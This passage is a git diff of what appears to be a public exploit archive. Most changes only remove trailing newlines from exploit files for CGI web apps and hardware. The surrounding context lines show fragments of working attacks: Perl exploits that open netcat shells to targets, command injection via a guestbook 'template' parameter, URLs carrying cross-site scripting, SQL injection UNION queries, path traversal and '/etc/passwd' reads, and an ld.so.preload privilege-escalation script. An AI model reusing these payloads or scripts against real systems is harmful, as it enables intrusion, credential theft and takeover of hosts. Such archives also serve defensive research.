no-cache -Host: localhost - +Host: localhost \ No newline at end of file diff --git a/platforms/cgi/webapps/18582.txt b/platforms/cgi/webapps/18582.txt index f8dd09799..9a71b3eac 100755 --- a/platforms/cgi/webapps/18582.txt +++ b/platforms/cgi/webapps/18582.txt @@ -258,4 +258,4 @@ style="text-decoration:none">ZSL-2012-5078 - + \ No newline at end of file diff --git a/platforms/cgi/webapps/187.pl b/platforms/cgi/webapps/187.pl index 1e2fec053..194a35e13 100755 --- a/platforms/cgi/webapps/187.pl +++ b/platforms/cgi/webapps/187.pl @@ -68,4 +68,4 @@ print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); sleep(5); system("nc -w 10 $target 60179"); exit(0); -# milw0rm.com [2000-11-17] +# milw0rm.com [2000-11-17] \ No newline at end of file diff --git a/platforms/cgi/webapps/188.pl b/platforms/cgi/webapps/188.pl index 7e6198c0d..6cdbb0891 100755 --- a/platforms/cgi/webapps/188.pl +++ b/platforms/cgi/webapps/188.pl @@ -92,4 +92,4 @@ sub connect_host { } -# milw0rm.com [2000-11-17] +# milw0rm.com [2000-11-17] \ No newline at end of file diff --git a/platforms/cgi/webapps/20712.rb b/platforms/cgi/webapps/20712.rb index 2bf7b0dd9..2640ac51d 100755 --- a/platforms/cgi/webapps/20712.rb +++ b/platforms/cgi/webapps/20712.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}") end -end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/21405.txt b/platforms/cgi/webapps/21405.txt index 68ff1121f..e45c5ae7e 100755 --- a/platforms/cgi/webapps/21405.txt +++ b/platforms/cgi/webapps/21405.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/4565/info Faq-O-Matic 2.711 and 2.712 is a web-based Frequently Asked Question (FAQ) management system. It is vulnerable to a cross site scripting issue arising from a failure to filter HTML or script from a malformed query, returning the submitted script as an error message which is then processed by the browser. This is done by submitting the script as an argument to the Faq-O-Matic component "fom.cgi" - specifically, to the "file" parameter. This script is then treated by the user's browser as though it originated from the Faq-O-Matic web site. -http://www.wherever.tld/path_to_Faq-O-Matic/fom?file=&step +http://www.wherever.tld/path_to_Faq-O-Matic/fom?file=&step \ No newline at end of file diff --git a/platforms/cgi/webapps/21406.txt b/platforms/cgi/webapps/21406.txt index df27b9efb..c52e2dabd 100755 --- a/platforms/cgi/webapps/21406.txt +++ b/platforms/cgi/webapps/21406.txt @@ -7,4 +7,4 @@ Philip Chinery's Guestbook does not filter script code from form fields. As a re This issue has been reported for Philip Chinery's Guestbook version 1.1. Other versions may also be affected. http://[target]/cgi-bin/guestbook.pl?action=sign&cwrite=none&Name=&EMail=example@example.com&Text=css%20exam -ple +ple \ No newline at end of file diff --git a/platforms/cgi/webapps/21435.txt b/platforms/cgi/webapps/21435.txt index 0e530e543..82cefb3d7 100755 --- a/platforms/cgi/webapps/21435.txt +++ b/platforms/cgi/webapps/21435.txt @@ -10,5 +10,4 @@ http://somewhere/as_web4.exe?Command=First&File=non-existant-file These examples demonstrate the cross site scripting issue: /as_web4.exe?existant-ask-file!!.ask+B+ -/as_web.exe?existant-ask-file!!.ask+B+ -http://target/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"> - +http://target/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"> \ No newline at end of file diff --git a/platforms/cgi/webapps/21567.pl b/platforms/cgi/webapps/21567.pl index 32700fe1a..645eca086 100755 --- a/platforms/cgi/webapps/21567.pl +++ b/platforms/cgi/webapps/21567.pl @@ -65,5 +65,4 @@ if($socket = IO::Socket::INET->new("$host:$port")){ print $socket "$buf"; read($socket,$buf,1500); print "recieved:\n$buf\n"; -} - +} \ No newline at end of file diff --git a/platforms/cgi/webapps/22111.pl b/platforms/cgi/webapps/22111.pl index ff57cb140..c3b9ac029 100755 --- a/platforms/cgi/webapps/22111.pl +++ b/platforms/cgi/webapps/22111.pl @@ -52,5 +52,4 @@ while () { print $linha; } close (SOCK) || die "close: $!"; -exit; - +exit; \ No newline at end of file diff --git a/platforms/cgi/webapps/22169.pl b/platforms/cgi/webapps/22169.pl index b9861421a..bb2786d36 100755 --- a/platforms/cgi/webapps/22169.pl +++ b/platforms/cgi/webapps/22169.pl @@ -130,4 +130,4 @@ be somewhere in the html output\n"; print "the above is received from the server, if you have a 404 or 403, theres somethin wrong if not, and no command output, try again.. if command ouput buggy, convert \\v to \\n with tr\n"; - + \ No newline at end of file diff --git a/platforms/cgi/webapps/22260.c b/platforms/cgi/webapps/22260.c index 8d2931703..739b6ba36 100755 --- a/platforms/cgi/webapps/22260.c +++ b/platforms/cgi/webapps/22260.c @@ -67,4 +67,4 @@ fprintf(stdout, "Command sent/executed!\n\n"); close(sock); exit (0); } -} +} \ No newline at end of file diff --git a/platforms/cgi/webapps/22261.pl b/platforms/cgi/webapps/22261.pl index 3c4d81fd8..5c7a81cbc 100755 --- a/platforms/cgi/webapps/22261.pl +++ b/platforms/cgi/webapps/22261.pl @@ -28,4 +28,4 @@ if ($response->code == 200){ else { print "The command could not be sent.\n"; - } + } \ No newline at end of file diff --git a/platforms/cgi/webapps/22262.pl b/platforms/cgi/webapps/22262.pl index 61d0a2b64..cc55bb434 100755 --- a/platforms/cgi/webapps/22262.pl +++ b/platforms/cgi/webapps/22262.pl @@ -196,4 +196,4 @@ note.. web directory is normally /var/www/html"; print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n\n\n\n\n\n\n\n\n\n\n\n"; -}; +}; \ No newline at end of file diff --git a/platforms/cgi/webapps/22263.pl b/platforms/cgi/webapps/22263.pl index f0cad87c6..4cfb3ae89 100755 --- a/platforms/cgi/webapps/22263.pl +++ b/platforms/cgi/webapps/22263.pl @@ -74,5 +74,4 @@ if ($rem) { print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r"; @resp = <$rem>; } -print "@resp\n\n"; - +print "@resp\n\n"; \ No newline at end of file diff --git a/platforms/cgi/webapps/22380.pl b/platforms/cgi/webapps/22380.pl index 7218d5022..ed59c0989 100755 --- a/platforms/cgi/webapps/22380.pl +++ b/platforms/cgi/webapps/22380.pl @@ -33,4 +33,4 @@ exit; print "\n *** [2] Host is vulnerable...Sending exploit code"; print $connect "$elite"; system('nc -v $ARGV[0] 6900 '); -close($connect); +close($connect); \ No newline at end of file diff --git a/platforms/cgi/webapps/22499.pl b/platforms/cgi/webapps/22499.pl index 2125d0d13..0ee523f8d 100755 --- a/platforms/cgi/webapps/22499.pl +++ b/platforms/cgi/webapps/22499.pl @@ -29,5 +29,4 @@ $sock->print( "\r\n" ) or die "write: $!"; -print while <$sock>; - +print while <$sock>; \ No newline at end of file diff --git a/platforms/cgi/webapps/22500.pl b/platforms/cgi/webapps/22500.pl index 61d15f93e..9d72265b7 100755 --- a/platforms/cgi/webapps/22500.pl +++ b/platforms/cgi/webapps/22500.pl @@ -82,7 +82,4 @@ sub URLEncode { my $theURL=$_[0]; $theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg; return $theURL; -} - - - +} \ No newline at end of file diff --git a/platforms/cgi/webapps/22559.pl b/platforms/cgi/webapps/22559.pl index c38017550..d615a62c5 100755 --- a/platforms/cgi/webapps/22559.pl +++ b/platforms/cgi/webapps/22559.pl @@ -179,4 +179,4 @@ note.. web directory is normally /var/www/html"; print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n\n\n\n\n\n\n\n\n\n\n\n"; -}; +}; \ No newline at end of file diff --git a/platforms/cgi/webapps/22571.pl b/platforms/cgi/webapps/22571.pl index 87d995cdb..b9a66fd6c 100755 --- a/platforms/cgi/webapps/22571.pl +++ b/platforms/cgi/webapps/22571.pl @@ -194,6 +194,4 @@ print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n Command: SCAN URL HELP QUIT"; print "\n\n\n\n\n\n\n\n\n\n\n"; -}; - - +}; \ No newline at end of file diff --git a/platforms/cgi/webapps/22572.pl b/platforms/cgi/webapps/22572.pl index cf4ca0b10..7dfc542a6 100755 --- a/platforms/cgi/webapps/22572.pl +++ b/platforms/cgi/webapps/22572.pl @@ -195,6 +195,4 @@ print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n Command: SCAN URL HELP QUIT"; print "\n\n\n\n\n\n\n\n\n\n\n"; -}; - - +}; \ No newline at end of file diff --git a/platforms/cgi/webapps/2266.txt b/platforms/cgi/webapps/2266.txt index 22ce7b988..49b2d2c8b 100755 --- a/platforms/cgi/webapps/2266.txt +++ b/platforms/cgi/webapps/2266.txt @@ -67,4 +67,4 @@ Contact For further enquries, comments, suggestions or bug reports, simply email them to Tan Chew Keong (chewkeong[at]vuln[dot]sg) -# milw0rm.com [2006-08-28] +# milw0rm.com [2006-08-28] \ No newline at end of file diff --git a/platforms/cgi/webapps/22669.txt b/platforms/cgi/webapps/22669.txt index 794edc59d..378059e06 100755 --- a/platforms/cgi/webapps/22669.txt +++ b/platforms/cgi/webapps/22669.txt @@ -4,5 +4,4 @@ It has been reported that a cross-site scripting vulnerability exists in Bandmin http://www.example.com/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]&month=[SECOND SCRIPT] -http://www.example.com/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=[THIRD SCRIPT] - +http://www.example.com/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=[THIRD SCRIPT] \ No newline at end of file diff --git a/platforms/cgi/webapps/2267.txt b/platforms/cgi/webapps/2267.txt index 9ecbadd89..ecf5f5b2b 100755 --- a/platforms/cgi/webapps/2267.txt +++ b/platforms/cgi/webapps/2267.txt @@ -111,4 +111,4 @@ Contact For further enquries, comments, suggestions or bug reports, simply email them to Tan Chew Keong (chewkeong[at]vuln[dot]sg) -# milw0rm.com [2006-08-28] +# milw0rm.com [2006-08-28] \ No newline at end of file diff --git a/platforms/cgi/webapps/23409.c b/platforms/cgi/webapps/23409.c index 42f95ba08..93fd350b2 100755 --- a/platforms/cgi/webapps/23409.c +++ b/platforms/cgi/webapps/23409.c @@ -101,5 +101,4 @@ sizeof(struct sockaddr)) == -1) { printf("[!] Disconnected.\n"); return(0); -} - +} \ No newline at end of file diff --git a/platforms/cgi/webapps/23418.pl b/platforms/cgi/webapps/23418.pl index 4c0773a22..1aeb90fd4 100755 --- a/platforms/cgi/webapps/23418.pl +++ b/platforms/cgi/webapps/23418.pl @@ -64,5 +64,4 @@ while ($i!=-1) { substr($t,0,$i+7,""); $j = index($t,"\""); print "\tpass: ".substr($t,0,$j)."\n"; -} - +} \ No newline at end of file diff --git a/platforms/cgi/webapps/23466.txt b/platforms/cgi/webapps/23466.txt index edb1d7568..3c6cfef02 100755 --- a/platforms/cgi/webapps/23466.txt +++ b/platforms/cgi/webapps/23466.txt @@ -4,5 +4,4 @@ It has been reported that QuikStore Shopping Cart may be prone to an information Specific vulnerable versions of the software were not identified in the report; therefore it is assumed that the current version QuikStore Shopping Cart v2.12 is vulnerable to this issue. -http://[target]/cgi-bin/quikstore.cgi?store=' - +http://[target]/cgi-bin/quikstore.cgi?store=' \ No newline at end of file diff --git a/platforms/cgi/webapps/23485.txt b/platforms/cgi/webapps/23485.txt index 62e693ff8..3d89b1f8d 100755 --- a/platforms/cgi/webapps/23485.txt +++ b/platforms/cgi/webapps/23485.txt @@ -9,5 +9,4 @@ zone http://www.example.com/SCRIPTS/WA-USIAINFO.EXE? A1=ind0312d&L=dosback -http://www.example.com/Scripts/wa-demo.exe?A1=ind9807&L=demo - +http://www.example.com/Scripts/wa-demo.exe?A1=ind9807&L=demo \ No newline at end of file diff --git a/platforms/cgi/webapps/23548.txt b/platforms/cgi/webapps/23548.txt index cd26f36c5..2baa5c7d7 100755 --- a/platforms/cgi/webapps/23548.txt +++ b/platforms/cgi/webapps/23548.txt @@ -4,4 +4,4 @@ A number of vulnerabilities have been found in all version of MetaDot Corporatio /index.pl?id=[Evil_Query] /index.pl?iid=[Evil_Query] -/index.pl?isa=Session&op=auto_login&new_user=&key=[Evil_Query] +/index.pl?isa=Session&op=auto_login&new_user=&key=[Evil_Query] \ No newline at end of file diff --git a/platforms/cgi/webapps/23907.pl b/platforms/cgi/webapps/23907.pl index aac300c3b..b82badff1 100755 --- a/platforms/cgi/webapps/23907.pl +++ b/platforms/cgi/webapps/23907.pl @@ -45,4 +45,4 @@ if ($response->is_success) { print "----------------------------------------------\n"; # EOF by Xnuxer --- +-- \ No newline at end of file diff --git a/platforms/cgi/webapps/23939.txt b/platforms/cgi/webapps/23939.txt index 58205f5bd..79aa15d16 100755 --- a/platforms/cgi/webapps/23939.txt +++ b/platforms/cgi/webapps/23939.txt @@ -4,4 +4,4 @@ Multiple vulnerabilities have been identified in the application that may allow 1st Class Mail Server version 4.01 is reported to be prone to these issues, however, it is possible that other versions are affected as well. -http://www.example.com/AUTH=[some_value]/user/members.tagz?Site=www.example.com&Mailbox=[html_code] +http://www.example.com/AUTH=[some_value]/user/members.tagz?Site=www.example.com&Mailbox=[html_code] \ No newline at end of file diff --git a/platforms/cgi/webapps/24188.pl b/platforms/cgi/webapps/24188.pl index f4490476c..85d15646d 100755 --- a/platforms/cgi/webapps/24188.pl +++ b/platforms/cgi/webapps/24188.pl @@ -126,5 +126,4 @@ for(my $t=0;$t<$loop;$t++) { system("$wget$url$file"); } } -print("\nDone, if the files existed they should be in this directory.\n\nkiller 2004\nhttp://www.mostly-harmless.nl/"); - +print("\nDone, if the files existed they should be in this directory.\n\nkiller 2004\nhttp://www.mostly-harmless.nl/"); \ No newline at end of file diff --git a/platforms/cgi/webapps/242.pl b/platforms/cgi/webapps/242.pl index 6fe1ecd2c..9d26890dc 100755 --- a/platforms/cgi/webapps/242.pl +++ b/platforms/cgi/webapps/242.pl @@ -34,4 +34,4 @@ sysread($sock, $buffer, 100000); close $sock; -# milw0rm.com [2001-01-12] +# milw0rm.com [2001-01-12] \ No newline at end of file diff --git a/platforms/cgi/webapps/24402.php b/platforms/cgi/webapps/24402.php index d093b058a..d7851e276 100755 --- a/platforms/cgi/webapps/24402.php +++ b/platforms/cgi/webapps/24402.php @@ -376,4 +376,4 @@ HREF="javascript:saveData()">-=[Go!Go!]=- +VALUE="set_variables"> \ No newline at end of file diff --git a/platforms/cgi/webapps/24408.txt b/platforms/cgi/webapps/24408.txt index 1353ac777..80ddac891 100755 --- a/platforms/cgi/webapps/24408.txt +++ b/platforms/cgi/webapps/24408.txt @@ -4,5 +4,4 @@ WebAPP is reported prone to a directory-traversal vulnerability because the appl An attacker can exploit this vulnerability to retrieve arbitrary, potentially sensitive files from the hosting computer with the privileges of the webserver. gthe attacker could trivially retrieve DES-encrypted password hashes for all users of the application. This may aid the attacker in further attacks. -http://www.example.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00 - +http://www.example.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/25920.pl b/platforms/cgi/webapps/25920.pl index 59405c7b5..383dc55e1 100755 --- a/platforms/cgi/webapps/25920.pl +++ b/platforms/cgi/webapps/25920.pl @@ -74,5 +74,4 @@ while ( <$sock> ) ++$lE; } -} - +} \ No newline at end of file diff --git a/platforms/cgi/webapps/25950.pl b/platforms/cgi/webapps/25950.pl index e6efd74ec..64daee011 100755 --- a/platforms/cgi/webapps/25950.pl +++ b/platforms/cgi/webapps/25950.pl @@ -56,5 +56,4 @@ The issue is due to a design fault, where files that are shared by users are app "Using $reqmeth$break$break", "$cookie\n"; - print end_html; - + print end_html; \ No newline at end of file diff --git a/platforms/cgi/webapps/26256.txt b/platforms/cgi/webapps/26256.txt index e7173d061..44c0238e4 100755 --- a/platforms/cgi/webapps/26256.txt +++ b/platforms/cgi/webapps/26256.txt @@ -4,5 +4,4 @@ MIVA Merchant 5 is prone to a cross-site scripting vulnerability.This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/mm5/merchant.mvc&Screen=ACNT&Action=EMPW&Customer_Login="> - +http://www.example.com/mm5/merchant.mvc&Screen=ACNT&Action=EMPW&Customer_Login="> \ No newline at end of file diff --git a/platforms/cgi/webapps/26289.txt b/platforms/cgi/webapps/26289.txt index 56321f51d..8fe7469aa 100755 --- a/platforms/cgi/webapps/26289.txt +++ b/platforms/cgi/webapps/26289.txt @@ -7,5 +7,4 @@ An attacker can prefix arbitrary commands with the pipe '|' character and have t http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns= http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=. -http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=. - +http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=. \ No newline at end of file diff --git a/platforms/cgi/webapps/26461.txt b/platforms/cgi/webapps/26461.txt index f74ed2219..f05373827 100755 --- a/platforms/cgi/webapps/26461.txt +++ b/platforms/cgi/webapps/26461.txt @@ -29,4 +29,4 @@ document.forms[0].submit(); + \ No newline at end of file diff --git a/platforms/cgi/webapps/26507.txt b/platforms/cgi/webapps/26507.txt index 9a5e8b98a..9807c0834 100755 --- a/platforms/cgi/webapps/26507.txt +++ b/platforms/cgi/webapps/26507.txt @@ -8,4 +8,4 @@ Other attacks are also possible. Walla Telesite version 3.0 is affected; earlier versions are also affected. -http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20 +http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20 \ No newline at end of file diff --git a/platforms/cgi/webapps/26508.txt b/platforms/cgi/webapps/26508.txt index 3952b4400..684a2904b 100755 --- a/platforms/cgi/webapps/26508.txt +++ b/platforms/cgi/webapps/26508.txt @@ -13,4 +13,4 @@ http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61' http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2 http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null, -null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns-- +null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns-- \ No newline at end of file diff --git a/platforms/cgi/webapps/26846.txt b/platforms/cgi/webapps/26846.txt index 994524ac3..bf43d4689 100755 --- a/platforms/cgi/webapps/26846.txt +++ b/platforms/cgi/webapps/26846.txt @@ -6,5 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://www.example.com/atl.cgi?ct=&md=search&brf=&before=&sch_allsubct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E http://www.example.com/atl.cgi?ct=&md=search&brf=&before=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E -http://www.example.com/atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E - +http://www.example.com/atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/26852.txt b/platforms/cgi/webapps/26852.txt index dd275e36d..c856dd3e7 100755 --- a/platforms/cgi/webapps/26852.txt +++ b/platforms/cgi/webapps/26852.txt @@ -7,5 +7,4 @@ An attacker may leverage these issues to have arbitrary script code executed in Version 1.8 of PDEstore is affected by these issues. Other versions may also be affected. http://www.example.com/pdestore.cgi?product=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E -http://www.example.com/pdestore.cgi?product=jewelry&cart_id=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E - +http://www.example.com/pdestore.cgi?product=jewelry&cart_id=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/289.pl b/platforms/cgi/webapps/289.pl index 8a1e88474..201f975e4 100755 --- a/platforms/cgi/webapps/289.pl +++ b/platforms/cgi/webapps/289.pl @@ -55,4 +55,4 @@ my $woot = join(' ',@DATA); if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } else { print "@DATA"; } -# milw0rm.com [2001-03-04] +# milw0rm.com [2001-03-04] \ No newline at end of file diff --git a/platforms/cgi/webapps/30156.txt b/platforms/cgi/webapps/30156.txt index cae3da6bf..5cecc57ca 100755 --- a/platforms/cgi/webapps/30156.txt +++ b/platforms/cgi/webapps/30156.txt @@ -14,4 +14,4 @@ Clandestine - MentorSec - Titio Vamp - LLL - Slayer Owner - masoqfellipe Exploit: /cgi/cgilua.exe/sys/start.htm?sid=[ SQLi ] -Demo: http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157 +Demo: http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157 \ No newline at end of file diff --git a/platforms/cgi/webapps/30260.txt b/platforms/cgi/webapps/30260.txt index 283bb5e0a..f1f7f457c 100755 --- a/platforms/cgi/webapps/30260.txt +++ b/platforms/cgi/webapps/30260.txt @@ -29,4 +29,4 @@ control over the device. It's quite powerful little computer, and a whole hell of a lot of fun to play around with. A word of advice, though -- don't touch libc in any way, shape, or form, as there's no reflash mechanism I've found on the device, which is why I now have a -bricked pico pro sitting on my desk ;) +bricked pico pro sitting on my desk ;) \ No newline at end of file diff --git a/platforms/cgi/webapps/30475.txt b/platforms/cgi/webapps/30475.txt index c9c194ef2..8dc15b773 100755 --- a/platforms/cgi/webapps/30475.txt +++ b/platforms/cgi/webapps/30475.txt @@ -77,4 +77,4 @@ folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1 Timeline: - 05/12/2013: First contact with the vendor - 06/12/2013: Vulnerability details sent to the vendor -- 20/12/2013: Patch released by the vendor +- 20/12/2013: Patch released by the vendor \ No newline at end of file diff --git a/platforms/cgi/webapps/30587.txt b/platforms/cgi/webapps/30587.txt index 28401a2a0..cc7680561 100755 --- a/platforms/cgi/webapps/30587.txt +++ b/platforms/cgi/webapps/30587.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the device or to pre Root the camera/add a backdoor - http://www.example.com/admin/restartMessage.shtml?server='; ?> -# milw0rm.com [2009-09-14] +# milw0rm.com [2009-09-14] \ No newline at end of file diff --git a/platforms/hardware/dos/9956.txt b/platforms/hardware/dos/9956.txt index 3b1d9a806..0577f5cf0 100755 --- a/platforms/hardware/dos/9956.txt +++ b/platforms/hardware/dos/9956.txt @@ -20,5 +20,4 @@ IV. About This vulnerability was discovered by Townsend Ladd Harris -Vulnerability details will be posted at: http://tlhsecurity.blogspot.com/2009/10/palm-pre-webos-version-11-floating.html - +Vulnerability details will be posted at: http://tlhsecurity.blogspot.com/2009/10/palm-pre-webos-version-11-floating.html \ No newline at end of file diff --git a/platforms/hardware/dos/9980.txt b/platforms/hardware/dos/9980.txt index 593ae725a..3e9170400 100755 --- a/platforms/hardware/dos/9980.txt +++ b/platforms/hardware/dos/9980.txt @@ -118,10 +118,4 @@ Disclosure Timeline (YYYY/MM/DD): release date to 2009.10.29. (no response) 2009.10.20: Found the KB article and the Hotfix on Websense website -2009.10.20: Release of this advisory - - - - - - +2009.10.20: Release of this advisory \ No newline at end of file diff --git a/platforms/hardware/local/14727.py b/platforms/hardware/local/14727.py index 3ddf3b6a5..06cf36c23 100755 --- a/platforms/hardware/local/14727.py +++ b/platforms/hardware/local/14727.py @@ -143,4 +143,4 @@ pdf_content = COMEX_PDF_TEMPLATE pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content))) pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content) open(outputFileName,'w').write(pdf_content) -print '[+] File "'+outputFileName+'" created, test it!!' +print '[+] File "'+outputFileName+'" created, test it!!' \ No newline at end of file diff --git a/platforms/hardware/local/20999.c b/platforms/hardware/local/20999.c index 7c9c1a144..29c02ab10 100755 --- a/platforms/hardware/local/20999.c +++ b/platforms/hardware/local/20999.c @@ -103,5 +103,4 @@ void usage(char *name){ exit(1); } -/* EOF */ - +/* EOF */ \ No newline at end of file diff --git a/platforms/hardware/local/21000.sh b/platforms/hardware/local/21000.sh index 77ae142ac..e47153dea 100755 --- a/platforms/hardware/local/21000.sh +++ b/platforms/hardware/local/21000.sh @@ -58,5 +58,4 @@ echo "** first fixing /etc/ld.so.preload may result in system malfunction" su - echo "** cleaning up" > /etc/ld.so.preload -rm -f /tmp/g.so - +rm -f /tmp/g.so \ No newline at end of file diff --git a/platforms/hardware/local/25718.txt b/platforms/hardware/local/25718.txt index 11f00885b..33a3a2f6e 100755 --- a/platforms/hardware/local/25718.txt +++ b/platforms/hardware/local/25718.txt @@ -202,6 +202,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or support -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/hardware/local/41745.txt b/platforms/hardware/local/41745.txt index 3afb67238..ad11d3ce3 100755 --- a/platforms/hardware/local/41745.txt +++ b/platforms/hardware/local/41745.txt @@ -212,4 +212,4 @@ of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, -this information. +this information. \ No newline at end of file diff --git a/platforms/hardware/local/41754.txt b/platforms/hardware/local/41754.txt index a3b8d1a59..0a419da1c 100755 --- a/platforms/hardware/local/41754.txt +++ b/platforms/hardware/local/41754.txt @@ -137,4 +137,4 @@ March 28th, 2017: Public advisory released VIII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. -I accept no responsibility for any damage caused by the use or misuse of this advisory. +I accept no responsibility for any damage caused by the use or misuse of this advisory. \ No newline at end of file diff --git a/platforms/hardware/local/8833.txt b/platforms/hardware/local/8833.txt index 56fb44286..a1d997255 100755 --- a/platforms/hardware/local/8833.txt +++ b/platforms/hardware/local/8833.txt @@ -28,4 +28,4 @@ killall: 2: no process killed 7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/hardware/local/9688.txt b/platforms/hardware/local/9688.txt index 1a258070e..5f95f54e8 100755 --- a/platforms/hardware/local/9688.txt +++ b/platforms/hardware/local/9688.txt @@ -28,4 +28,4 @@ One may think there are limitations once logged into shell without root access on an IP3. Wrong. -# milw0rm.com [2009-09-15] +# milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/hardware/remote/10451.txt b/platforms/hardware/remote/10451.txt index 4f4740205..0959a6674 100755 --- a/platforms/hardware/remote/10451.txt +++ b/platforms/hardware/remote/10451.txt @@ -202,4 +202,4 @@ passwords... Regards, -Rubén. +Rubén. \ No newline at end of file diff --git a/platforms/hardware/remote/10510.txt b/platforms/hardware/remote/10510.txt index 2eef5d390..dad3d7299 100755 --- a/platforms/hardware/remote/10510.txt +++ b/platforms/hardware/remote/10510.txt @@ -100,4 +100,4 @@ XII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage -caused by the use or misuse of this information. +caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/hardware/remote/1081.c b/platforms/hardware/remote/1081.c index a212b14f1..f53f4f3e8 100755 --- a/platforms/hardware/remote/1081.c +++ b/platforms/hardware/remote/1081.c @@ -185,4 +185,4 @@ threat : command not found */ -// milw0rm.com [2005-07-03] +// milw0rm.com [2005-07-03] \ No newline at end of file diff --git a/platforms/hardware/remote/12298.txt b/platforms/hardware/remote/12298.txt index f26fbe8ee..4ae19f0e0 100755 --- a/platforms/hardware/remote/12298.txt +++ b/platforms/hardware/remote/12298.txt @@ -40,5 +40,4 @@ For a remote modem: hkm@hakim.ws - [ Comunidad Underground de Mexico - http://www.underground.org.mx ] - + [ Comunidad Underground de Mexico - http://www.underground.org.mx ] \ No newline at end of file diff --git a/platforms/hardware/remote/1333.pm b/platforms/hardware/remote/1333.pm index f64b4b025..201e90ea5 100755 --- a/platforms/hardware/remote/1333.pm +++ b/platforms/hardware/remote/1333.pm @@ -253,4 +253,4 @@ sub ProcessHTTP 1; -# milw0rm.com [2005-11-20] +# milw0rm.com [2005-11-20] \ No newline at end of file diff --git a/platforms/hardware/remote/14536.txt b/platforms/hardware/remote/14536.txt index b32c40306..ae2926e11 100755 --- a/platforms/hardware/remote/14536.txt +++ b/platforms/hardware/remote/14536.txt @@ -176,5 +176,4 @@ damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or -incidental damages so the foregoing limitation may not apply. - +incidental damages so the foregoing limitation may not apply. \ No newline at end of file diff --git a/platforms/hardware/remote/15842.txt b/platforms/hardware/remote/15842.txt index f69e73beb..273ef6c54 100755 --- a/platforms/hardware/remote/15842.txt +++ 